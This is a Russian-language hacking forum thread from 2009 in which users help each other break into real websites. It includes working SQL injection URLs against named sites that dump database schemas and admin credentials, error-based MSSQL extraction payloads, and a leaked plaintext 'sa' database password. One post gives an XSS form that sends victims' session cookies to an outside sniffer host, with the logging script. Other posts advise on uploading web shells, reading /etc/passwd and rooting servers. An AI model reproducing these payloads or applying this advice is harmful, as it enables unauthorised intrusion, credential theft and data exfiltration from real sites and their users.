сталкнулся сейчас с такой вещью как Tomcat Server Administration, кто подскажет где мне на никсовой тачке искать tomcat-users.xml с паролями? и если я туда получю доступ есть ли шансы залить шелл? поделитесь опытом (=

[aywo]
14.11.2009, 10:33
сталкнулся сейчас с такой вещью как Tomcat Server Administration, кто подскажет где мне на никсовой тачке искать tomcat-users.xml с паролями? и если я туда получю доступ есть ли шансы залить шелл? поделитесь опытом (=

нужный тебе файл хранится в
$CATALINA_HOME/conf/tomcat-users.xml,
где $CATALINA_HOME, папка, указанная при установке сервера приложений

Aртем
14.11.2009, 12:54
сталкнулся сейчас с такой вещью как Tomcat Server Administration, кто подскажет где мне на никсовой тачке искать tomcat-users.xml с паролями? и если я туда получю доступ есть ли шансы залить шелл? поделитесь опытом (=
find / -name tomcat-users.xml

SpYeR
14.11.2009, 12:59
А к в каких случаях/версиях Апач выполняет предыдущий тип файла, если не знает основной? Например, shell.php.qwe . У меня на win, в денвере работает, а на хостингах что-то нет ;/

geezer.code
14.11.2009, 13:10
А к в каких случаях/версиях Апач выполняет предыдущий тип файла, если не знает основной? Например, shell.php.qwe . У меня на win, в денвере работает, а на хостингах что-то нет ;/
должен быть подключен mod_mime

dimonle
14.11.2009, 13:34
Хмм...а есть где нить отдельная тема про эту фичу?насколько я понял сейчас у меня с сайтом ситуация номер 2.может намекнёшь как ее обойти?

Keltos
14.11.2009, 14:44
Можно ли найти sql или xss на юкоз сайтах

dimonle
14.11.2009, 15:13
Знаю ток насчет xss,раньше вроде можно было делать через смайлы.(т.е.ты на свое сайте делаешь скрипт,скрываешь его под картинкой и вставляешь этот смайл в чате на юкозе)поищи что то подобное.а по поводу скуля вроде как нет.

bons
14.11.2009, 16:16
чем может быть объяснено следующее: у директории на сервере права drwxrwxrwx но записать в нее ничего не удается ни с помощью PHP ни с помощью INTO DUMPFILE в mysql. Места на диске хватает с избытком. Если смотреть stderr неудачного создания файла(например с помощью wget) то там лаконичное "permission denied"..

Jokester
14.11.2009, 16:24
safe_mode , open_basedir ?

Keltos
14.11.2009, 16:33
Знаю ток насчет xss,раньше вроде можно было делать через смайлы.(т.е.ты на свое сайте делаешь скрипт,скрываешь его под картинкой и вставляешь этот смайл в чате на юкозе)поищи что то подобное.а по поводу скуля вроде как нет.
это не xss была

Chest3r
14.11.2009, 16:35
Ребята, помогите разобраться. Нет сил уже, все перепробовал - не могу найти ничего полезного... Может быть так, что в базе нет логина и пароля?

http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,schema_name,3,4+from+information_ schema.schemata/*

http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,column_name,3,4+from+information_ schema.columns+where+table_schema=0x64625F70726F6D 74726163746F72/*

Shadrin
14.11.2009, 16:38
Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1
спасибо

m0Hze
14.11.2009, 16:43
Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1
спасибо
Посмотреть исходные коды.Ведь вайл вообще может сохраняться в папке,невидимой из веба.Ну или можно просканировать сайт на наличие директорий по виду:
up
upd
uploadfile
upload
...

Shadrin
14.11.2009, 16:49
А как гялнуть исходник ? сервер сразу выполняет,и я вижу страницу ошибки.. сканил по словарю бестолку...+ скан по линкам
iss 6.0/win32.

bons
14.11.2009, 16:50
safe_mode , open_basedir ?
нет safe_mode и запрещенных функций, команды выполняются нормально. open_basedir тоже нет. То есть system('ls -la'); с успехом выполнится но system('echo 1>1.txt'); уже никак

Pashkela
14.11.2009, 16:51
Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1
спасибо

Никак не понять, юзать мозг, выкладывать полную информацию о ДВИЖКЕ, потом думать и слушать советы зеленых. Скан тут не при чем.

Pashkela
14.11.2009, 16:54
чем может быть объяснено следующее: у директории на сервере права drwxrwxrwx но записать в нее ничего не удается ни с помощью PHP ни с помощью INTO DUMPFILE в mysql. Места на диске хватает с избытком. Если смотреть stderr неудачного создания файла(например с помощью wget) то там лаконичное "permission denied"..

нет прав, вот и всё понимание. Вывод:

1. Попробовать изменить права (если получиться)
2. Лить из админки форума (цмс и т.д.)

PS: Сталкивался с таким и не раз. Грамотно раставленные права для phpmyadmin-юзеров. Ничего необычного

ElteRUS
14.11.2009, 16:57
Ребята, помогите разобраться. Нет сил уже, все перепробовал - не могу найти ничего полезного... Может быть так, что в базе нет логина и пароля?

http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,schema_name,3,4+from+information_ schema.schemata/*

http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,column_name,3,4+from+information_ schema.columns+where+table_schema=0x64625F70726F6D 74726163746F72/*

Нету формы для авторизации пользователей, в админке бейсик авторизация. То какие пароли ты хочешь найти в бд ? Это просто маленький сайт какой-то фирмы для рекламы своей продукции.

Я обычно использую такой запрос для поиска актуальных таблиц

1+union+select+1,table_name,3,4+from+information_s chema.columns+where+column_name+like+0x256d61696c2 5/*

Будет произведена выборка таблиц, в которых есть столбцы, содержащие в своем имени `pass`. Так же можно поискать на `mail`, `login` ну и тп.

ElteRUS, смотри, www.pcci.org.za/admin - админка
Но опять же, в админку не попасть)

Ты хочешь чтобы я понегодовал вместе с тобой ? Ок. Злопакостные гоблины-администраторы не пускают нас в админку, мерзавцы !111

Факт, что ты нашел таблицу admins и извлек из нее логин\пароль не гарантирует тебе допуск в админку. Реальные данные авторизации админа могут находится в другой БД, в другой таблице (напр. users) , храниться в файле (напр. конфиге) или вообще могут быть прописаны в скрипте авторизации как константы (видел такое). Как повезет.

Pashkela
14.11.2009, 17:00
Факт, что ты нашел таблицу admins и извлек из нее логин\пароль не гарантирует тебе допуск в админку. Реальные данные авторизации админа могут находится в другой БД, в другой таблице (напр. users) , храниться в файле (напр. конфиге) или вообще могут быть прописаны в скрипте авторизации как константы (видел такое). Как повезет.

И это как минимум. Хотят ломать, да еще чтобы легко было, да еше возмущаются, когда нелегко. Просто млею с таких постов.

ElteRUS + 500

dimonle
14.11.2009, 17:00
Так что там насчет моего вопроса?есть у кого идеи?

Jokester
14.11.2009, 17:04
нет прав, вот и всё понимание. Вывод:

1. Попробовать изменить права (если получиться)
2. Лить из админки форума (цмс и т.д.)

PS: Сталкивался с таким и не раз. Грамотно раставленные права для phpmyadmin-юзеров. Ничего необычного

Расскажи плз как можно расставить такие права

Папка drwxrwxrwx
safe_mode , open_basedir no

А то мы тут что-то не вкуриваем :(

bons
14.11.2009, 17:05
нет прав, вот и всё понимание. Вывод:

1. Попробовать изменить права (если получиться)
2. Лить из админки форума (цмс и т.д.)

PS: Сталкивался с таким и не раз. Грамотно раставленные права для phpmyadmin-юзеров. Ничего необычного
как это нет прав? ls -la для текущей папки и всех файло выдает rwxrwxrwx то есть права на запись есть у всех.
Но при этом даже простой акт открытия файла на запись через PHP - fopen("newfile","w"); завершается с ошибкой. Естественно что ни через CMS ни через форум залить ничего не удается - у них не больше возможностей чем у меня. phpmyadmin'ом там и не пахнет но есть права root для sql-инъекции. Как я уже говорил, с помощью нее тоже залить не удается.

geezer.code
14.11.2009, 17:08
bons, а что показывает df и cat /etc/fstab?

m0Hze
14.11.2009, 17:10
Расскажи плз как можно расставить такие права

Папка drwxrwxrwx
safe_mode , open_basedir no

А то мы тут что-то не вкуриваем :(
Я думаю человек просто ошибся,и хотел сказать именно про INTO DUMP_FILE.
Вообще,может быть что угодно :) Может быть висит демон,который блокирует любые изменения в файловой структуре сервера,да ктож его знает
2bons посмотри процессы,попробуй записать файл в /tmp/ ,затем mv в нужную директорию.Возможно так получиться.

Pashkela
14.11.2009, 17:11
2 jokester:

Если зашел под рутом и доступно изменение БД mysql (для того, чтобы изменить права рута, иногда тупо оставляют рут доступ, но у рута (который же может и изменить эти права) отбирают права на некоторые функции) - в этом случае. Как на это влияет safe_mode - честно, не знаю.

PS: Сорри, читаю невнимательно, даже не понял про что речь шла, думал про заливку из phpmyadmin

bons
14.11.2009, 17:15
bons, а что показывает df и cat /etc/fstab?

df -h:
Filesystem Size Used Avail Use% Mounted on
/dev/sda6 5.7G 3.9G 1.6G 71% /
/dev/sda5 9.7G 952M 8.2G 11% /home
/dev/sda2 34G 8.4G 24G 27% /var
/dev/sda3 24G 3.3G 20G 15% /opt
/dev/sda9 66G 2.0G 61G 4% /usr
/dev/sda1 107M 37M 65M 37% /boot
tmpfs 502M 0 502M 0% /dev/shm
cat /etc/fstab:
LABEL=/ / ext3 defaults 1 1
LABEL=/home /home ext3 defaults 1 2
LABEL=/var /var ext3 defaults 1 2
LABEL=/opt /opt ext3 defaults 1 2
LABEL=/usr /usr ext3 defaults 1 2
LABEL=/tmp /tmp ext3 defaults, noexec 1 2
LABEL=/boot /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/sda8 swap swap defaults 0 0

уже отмечал, что места хватает,
смонтирован вроде без особых нюансов
2bons посмотри процессы,попробуй записать файл в /tmp/ ,затем mv в нужную директорию.Возможно так получиться.
из tmp файл не копируется. В процессах вроде как ничего подозрительного но не могу быть в этом уверен.

m0Hze
14.11.2009, 18:18
df -h:
Filesystem Size Used Avail Use% Mounted on
/dev/sda6 5.7G 3.9G 1.6G 71% /
/dev/sda5 9.7G 952M 8.2G 11% /home
/dev/sda2 34G 8.4G 24G 27% /var
/dev/sda3 24G 3.3G 20G 15% /opt
/dev/sda9 66G 2.0G 61G 4% /usr
/dev/sda1 107M 37M 65M 37% /boot
tmpfs 502M 0 502M 0% /dev/shm
cat /etc/fstab:
LABEL=/ / ext3 defaults 1 1
LABEL=/home /home ext3 defaults 1 2
LABEL=/var /var ext3 defaults 1 2
LABEL=/opt /opt ext3 defaults 1 2
LABEL=/usr /usr ext3 defaults 1 2
LABEL=/tmp /tmp ext3 defaults, noexec 1 2
LABEL=/boot /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/sda8 swap swap defaults 0 0

уже отмечал, что места хватает,
смонтирован вроде без особых нюансов

из tmp файл не копируется. В процессах вроде как ничего подозрительного но не могу быть в этом уверен.
Интересная ситуация :)
А в других директориях копируеться,создаеться нормально? Таких как /tmp/ и подобные,с привилегией RWD? Тогда я бы искал альтернативу,шелл через логи,через сторонний сайт,поиск других директорий,или создание новых :)

Spyder
14.11.2009, 18:52
Расскажи плз как можно расставить такие права
на andrew file system такие права можно поставить =)
bons, попробуй в /var/tmp/

bons
14.11.2009, 19:42
Почему-то, несмотря на то что права на данную папку и все файлы в ней rwxrwxrwx функция php is_writable говорит что прав на запись нет :/
Доп инфо: владелец файлов apache:apache, права у меня: uid=48(apache) gid=48(apache) groups=48(apache)

в общем-то шелл удалось залить на соседний сайт там таких проблем не возникло. Порутать серв не удалось несмотря на то что ядро обновлялось достаточно давно.
Вопрос про права в этой папке остается нерешенным.

$n@ke
14.11.2009, 20:02
Спайдер прав, drwxrwxrwx - не показатель, по крайней мере для AFS.
Немного теории:

К примеру такое назначение AFS ACL, как "system:anyuser r" - дает права на чтение файла любому юзеру.
Смотрятся текущие права довольно просто:
fs listacl dir_name
Устанавливаются еще проще:
fs setacl dir_name username user_rights

бла бла бла..

jecka3000
14.11.2009, 22:40
почему не выводит пароля и логина?
http://www.thekarchergroup.mobi/mobile-news.php?id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+tblUser--

ElteRUS
14.11.2009, 22:50
id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+Adalet.tblUser--+

Chest3r
15.11.2009, 11:35
Нету формы для авторизации пользователей, в админке бейсик авторизация. То какие пароли ты хочешь найти в бд ? Это просто маленький сайт какой-то фирмы для рекламы своей продукции.

Я обычно использую такой запрос для поиска актуальных таблиц

1+union+select+1,table_name,3,4+from+information_s chema.columns+where+column_name+like+0x256d61696c2 5/*

Будет произведена выборка таблиц, в которых есть столбцы, содержащие в своем имени `pass`. Так же можно поискать на `mail`, `login` ну и тп.

Спасибо Большое! +10 тебе! :)

Есть еще кое что. Во время ковыряния на этом сайте, на одной из страниц как то вывалилась такая ошибочка, хорошо что сохранил:
<% err_mess1=0 msg=0 if request.form("Send").Count>0 then name=Trim(replace(Request.Form("name"), "'", "’")) mail=Trim(replace(Request.Form("mail"), "'", "’")) if len(name)=0 or len(mail)=0 then err_mess1=1 else 'connection_string="DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/gbdb.mdb") & ";" Set Conn1 = Server.CreateObject("ADODB.Connection") Conn1.Open "DRIVER=SQL Server;SERVER=SERVER;UID=sa;APP=Microsoft Open Database Connectivity;WSID=server;DATABASE=promtractor;Netw ork=DBMSSOCN;User Id=sa;PASSWORD=kpangen;" if request.Form("r1")="1" then set rc_check=SErver.createObject("ADODB.RECORDSET") rc_check.open "select * from subscribe where mail='"+mail+"'", conn1 if rc_check.eof then rc_check.close conn1.execute("insert into subscribe (name, mail) values ('"+name+"', '"+mail+"')") msg=1 else rc_check.close msg=3 end if else conn1.execute ("delete from subscribe where mail='"+mail+"'") msg=2 end if conn1.close end if end if if err_mess1>0 or msg=0 then %><% else response.write "" end if %>

Shaitan-Devil
15.11.2009, 18:08
Случайно не MSSQL? Sa- привелигированный пользователь MSSQL.

YuNi|[c
15.11.2009, 21:24
есть sqli на mssql, надо узнать rows определенного столбца, но count() не выводит результата. Инъекция через convert(int())
как выводит результатов, данные таблицы выводится но база большая хочу узнать общее количество строк.Еще обьединеие результатов через Concat()/concat_ws()/group_concat() ошибку выдает

[Raz0r]
15.11.2009, 21:34
count() возвращает int, поэтому необходимо преобразовать к типу varchar. Однако mssql преобразует строку обратно в число, поэтому я обычно делаю substring():
SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM information_schema.TABLES);
В запросе выше как раз есть пример конкатенации строк, для этого используется "+", методом GET необходимо использовать %2B.
Про аналог GROUP_CONCAT в MSSQL: http://raz0r.name/obzory/select-for-xml-sql-injection/

YuNi|[c
15.11.2009, 21:59
тогда запрось типа:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+c ount('Email')+from+tbl_Members))--
будеть


http://localhost/script.asp?id=4'+and+1=convert(int,(SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM tbl_Members)));
правильно я понял?

[Raz0r]
15.11.2009, 22:36
Нужно так:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--

YuNi|[c
15.11.2009, 22:43
']Нужно так:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
не погло ((

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near 'cast'.
а '^' обязательно ли

[Raz0r]
15.11.2009, 22:48
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'%2BCAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--

YuNi|[c
15.11.2009, 22:53
ООООО молодец спс сработал
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the varchar value '^190539' to data type int.

респект
Где прочитат про Cast?

[Raz0r]
15.11.2009, 23:31
http://msdn.microsoft.com/en-us/library/ms187928.aspx

[i]
16.11.2009, 11:13
Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?



http://clip2net.com/clip/m28193/thumb640/1258351952-clip-29kb.png (http://clip2net.com/page/m28193/2594509)

всем пионерам спасибо (:

Aртем
16.11.2009, 13:04
']Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?



http://clip2net.com/clip/m28193/thumb640/1258351952-clip-29kb.png (http://clip2net.com/page/m28193/2594509)

всем пионерам спасибо (:
ручками чекни

Pashkela
16.11.2009, 13:48
']Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?

всем пионерам спасибо (:

хочешь - дай ссылку в личку, прочекаю

G4bR1eL
16.11.2009, 16:20
Нужна небольшая консультация по XSS. XSS (пассивку) нашел , но немогу настроить frame.htm для сайта со сниффером.

<html>
<body>
<form name="xss" action="http://***.com.ua//index.jsp" method="post">
<input type="hidden" name="com" value="***">
<input type="hidden" name="***" value='1000">
<script>document.location.href="http://****.phpnet.us/s.php?"+document.cookie;</script>'>
<script language=javascript>xss.submit()</script>
</form>
</body>
</html>

Что верно будет прописывать в сием файле и почему? Звездочки поставил для конспирации.

Pashkela
16.11.2009, 16:44
Кхм, подскажите пожалуйста, как посчитать кол-во таблиц при PostgreSQL inj из information_schema.tables? В гугле что-то нифига нету

PS: Тот же самый вопрос и про кол-во колонок в табле и про кол-во данных в табле

Спасибо

Стандартные count(*) не работают что-то

в этой мегатеме

https://forum.antichat.ru/threadnav35599-1-10.html

живу уже два часа, там есть всё - как то, как это, а как посчитать - нету

B1t.exe
16.11.2009, 17:01
сегодня чисто случайно искал информацию(по медицине) и нашел такое:
__http://www.cardiosite.ru/doctors/registration.aspx
здесь ошибка такая:
Description: An error occurred during the compilation of a resource required to service this request. Please review the following specific error details and modify your source code appropriately.

Compiler Error Message: JS1241: Type 'ALP.Data.SqlData.QueryS' could not be found, is an assembly reference missing?

Source Error:



[No relevant source lines]


Source File: D:\sites\cardio\_controls\users\user-registration-solvay.ascx Line: 184 можно смело понять, что там IIS (ну и с MSSQL)

И хотел узнать - это что за ошибка и ошибка чего? IIS или SQL ? И как можно (или вобше можно) это использовать ?

P.S. Кстати, нажимая Show Detailed Compiler Output: можно получить еще кучу информации. там введены таблицы, да ? (UserIP, tbUserLastName, tbUserFirstName и т.д.)

l1ght
16.11.2009, 17:06
Pashkela, только count или limit


Если нетрудно, приведи пример хоть одной PostgreSQl инъекции, где вообще возможно посчитать кол-во таблиц в information_schema.tables и увидеть результат в сорцах страницы
лучше свой линк в студию ;)

Pashkela
16.11.2009, 17:10
2 l1ght:

Если нетрудно, приведи пример хоть одной PostgreSQl инъекции, где вообще возможно посчитать кол-во таблиц в information_schema.tables и увидеть результат в сорцах страницы

лучше свой линк в студию

отправил в личку

Jokester
16.11.2009, 17:19
Pashkela

count(*) отлично работает везде, уверен, что ты забываешь о приведении типов, из-за этого и проблемы

PS. Я бы дал линк, но ты-же начнёшь там свою чудопрогу тестить, и будет на нормальном сайте жопа в логах :)

Pashkela
16.11.2009, 17:22
2 jokester:

и будет на нормальном сайте жопа в логах

POST|GET|PROXY и жопа и в логах? :) Лучше не отмазывайся а дай ответ на вопрос. Ссылку (свою) скинул в личку

Jokester
16.11.2009, 17:29
2 jokester:
POST|GET|PROXY и жопа и в логах? :) Лучше не отмазывайся а дай ответ на вопрос. Ссылку (свою) скинул в личку
Отписал ответ в ПМ, по поводу проги тоже :)

По поводу отмазываться, спасибо, оценил

Pashkela
16.11.2009, 18:22
2 jokester:

спасибо, помогло :cool:

cheater_man
16.11.2009, 21:03
каким актульным сплоитом можно атаковать 143 или 25 или 119
заранее спасибо

G4bR1eL
16.11.2009, 23:55
Нужна небольшая консультация по XSS. XSS (пассивку) нашел , но немогу настроить frame.htm для сайта со сниффером.

<html>
<body>
<form name="xss" action="http://***.com.ua//index.jsp" method="post">
<input type="hidden" name="com" value="***">
<input type="hidden" name="***" value='1000">
<script>document.location.href="http://****.phpnet.us/s.php?"+document.cookie;</script>'>
<script language=javascript>xss.submit()</script>
</form>
</body>
</html>

Что верно будет прописывать в сием файле и почему? Звездочки поставил для конспирации.

Уточняю проблему, у клиентской части скрипт проводит успешно xss инъекцию через POST, и выводит в стиле ***.com/s.php?SESSIONID=0BA480B72D67E063B2FD65FDC66D;%20au thlogin=Lol;%20auth=e827b3871c8906ff8973b257bb2e9.

Все что после знака ? есть QUERY_STRING, а в сниффаке четко прописано

if ($file)
{ $f = fopen($filename, 'a');
flock($f,2);
fputs($f, $QUERY_STRING."\r\n\r\n\r\n");
fflush ($f);
flock($f,3);
fclose($f); }

Почему данные не уплывают на сниффер?

P.s. С куниковским сниффаком та же фигня. Я не представляю в чем проблема.

wolmer
17.11.2009, 01:57
Нужна помощь с ответами по этим вопросам: http://forum.antichat.ru/thread155501.html

[i]
17.11.2009, 04:41
//база MSSQL

итак, вернёмся к моим баранам
из нужной базы которая называется accountinfo, вот этим запросом, я вытянул названи нужной мне таблицы

http://***************.com/********.asp?id=637&Type=0++and+1=convert(int,(select+top+1+table_name +from+accountinfo.information_schema.tables+where+ table_name+NOT+IN+(select+top+0+table_name+from+ac countinfo.information_schema.tables)+))--

она под номером 0 под названием sales_rpt

затем из этой таблицы я получил нужную мне колонку

http://***************.com/********.asp?id=637&Type=0++and+1=convert(int,(select+top+1+column_nam e+from+accountinfo.information_schema.columns+wher e+column_name+NOT+IN+(select+top+0+column_name+fro m+accountinfo.information_schema.columns)+))--

она тоже под номером 0 и называется accumulated_rp


так вот, в этой же базе под номером 7 таблица AccountInfo

из которой мне нужно вывести колонки, но у меня не получается вывести колонки. как правильно заепашить запрос?

пробовал так

http://***************.com/********.asp?id=637&Type=0++and+1=convert(int,(select+AccountInfo+colu mn_name+from+accountinfo.information_schema.column s+where+column_name+NOT+IN+(select+top+1+column_na me+from+accountinfo.information_schema.columns)+))--

но не выводит

Spyder
17.11.2009, 06:04
select column_name from accountinfo.information_schema.columns where table_name='AccountInfo'

не?(

M1ks
17.11.2009, 12:19
Есть инъекция, делаю запрос на load_file и ничего не выходит,
xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const(substr(load_file('/etc/passwd'),1),1),name_const(substr(load_file('/etc/passwd'),1),1))a)b/*
Что делаю нетак? двойной запрос..

запрос на просмотр таблиц выглядит так:

xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b/*

Qwazar
17.11.2009, 12:43
M1ks, а таблицы то выводятся?

Qwazar
17.11.2009, 12:47
Значит прав нет. (FILE_PRIV = N ?)

Jokester
17.11.2009, 13:01
Что делаю нетак?

Ты нифига не читаешь. Даже мою подпись :(

двойной запрос, лоад_файл....

У меня возле компьютера стоит чашка с кофе, почему телефон не звонит, ведь сигареты кончились?

Aртем
17.11.2009, 18:05
Собственно интересует вопрос по разграничению прав не веб-сервере.
Какие права присваиваются например веб-шеллу который исполняется по средствам например eval, т.е. например есть CMS через которую можно добавить какую-либо запись на сайт, и она записывается в БД к примеру так
----------------------------------------------
| id | author | text |
----------------------------------------------
| 22 | joker1 | <?phpinfo()?> |
----------------------------------------------
ну и выводится так:
<html>
<head>
</head>
<body>
<?php
// запрос к БД который получение данных например
// в массив и импортированный например extract() и вот на выходе имеется
?>
<br>автор: <?php echo $id; ?>
<br>текст:</br>
<?php echo $text; ?>
</body>
</html>

ну или подобный вариант с eval только вывод будет немного иначе.

ну и соответственно что динамически присваивается id и доступен по адресу например index?id=[num]
Какие права будут у этого допустим веб-шелла, если как вы понимаете указать тот же system() или eval()?
Если например ему присвоются права index.php, то почему например на практике, это срабатывает не всегда, когда например у того же index.php права 777

$n@ke
17.11.2009, 19:54
вобще-то:
права пользователя, от имени которого запущен веб-сервер.
Исключения - при использовании suexec и т.п.

Быть может ты хотел узнать кто будет владельцем файла и я не так истолковал твой вопрос?))

gisTy
17.11.2009, 20:17
Какие права будут у этого допустим веб-шелла, если как вы понимаете указать тот же system() или eval()?
Если например ему присвоются права index.php, то почему например на практике, это срабатывает не всегда, когда например у того же index.php права 777
эм права у чего? ты о чем? у index.php нет прав. ты путаешь права пользователя на доступ(чтение, запись, исполнение) к файлам и аттрибуты файла показывающие каким пользователям разрешен доступ(чтение, запись, исполнение) к файлу.
man chmod и вообще почитай как-нибудь книгу о *nix'ax.
как я понял вопрос - так я на него и ответил

fng
17.11.2009, 22:13
Что скажите по этой ошибке? Похоже какая-то проблема со скобками?
Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1))' at line 1

так нормально
...id=36+and+1=0
так ошибка
...id=36+and+1=0+union+select+1

Pashkela
17.11.2009, 22:19
попробуй так:

...id=36+and+1=0+and+substring(version(),1,1)=5
...id=36+and+1=0+and+substring(version(),1,1)=4
...id=36+and+1=0+and+substring(version(),1,1)=3

плюс различные фильтры "--+", "/*", "#" (версию выясни для начала)

fng
17.11.2009, 22:29
попробуй так:

...id=36+and+1=0+and+substring(version(),1,1)=5
...id=36+and+1=0+and+substring(version(),1,1)=4
...id=36+and+1=0+and+substring(version(),1,1)=3

плюс различные фильтры "--+", "/*", "#" (версию выясни для начала)

тогда вот так...
id=36+and+substring(version(),1,1)=5

версия 5